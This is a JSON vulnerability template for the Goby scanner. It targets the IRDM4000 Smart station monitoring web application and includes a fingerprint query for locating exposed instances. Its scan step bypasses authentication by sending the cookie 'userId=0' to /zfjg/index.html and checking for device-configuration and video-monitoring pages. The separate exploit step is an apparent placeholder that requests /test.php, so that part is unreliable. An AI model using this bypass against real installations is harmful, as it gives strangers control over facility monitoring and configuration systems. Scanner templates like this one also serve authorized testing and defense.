Goby/json/IRDM4000_Smart_station_Unau...

106 lines
3.8 KiB
JSON

{
"Name": "IRDM4000 Smart station Unauthorized access",
"Level": "2",
"Tags": [],
"GobyQuery": "body=\"iRDM4000智慧站房在线监管\"",
"Description": "IRDM4000 unauthorized access vulnerability of userId=0",
"Product": "IRDM4000 Smart station",
"Homepage": "http://www.houtian-hb.com",
"Author": "gobysec@gmail.com",
"Impact": "",
"Recommendation": "",
"References": [
"https://gobies.org/"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/zfjg/index.html",
"follow_redirect": true,
"header": {
"Cookie": "userId=0"
},
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "设备配置",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "视频监管",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "2021-10-26 10:55:38",
"GobyVersion": "1.9.304"
}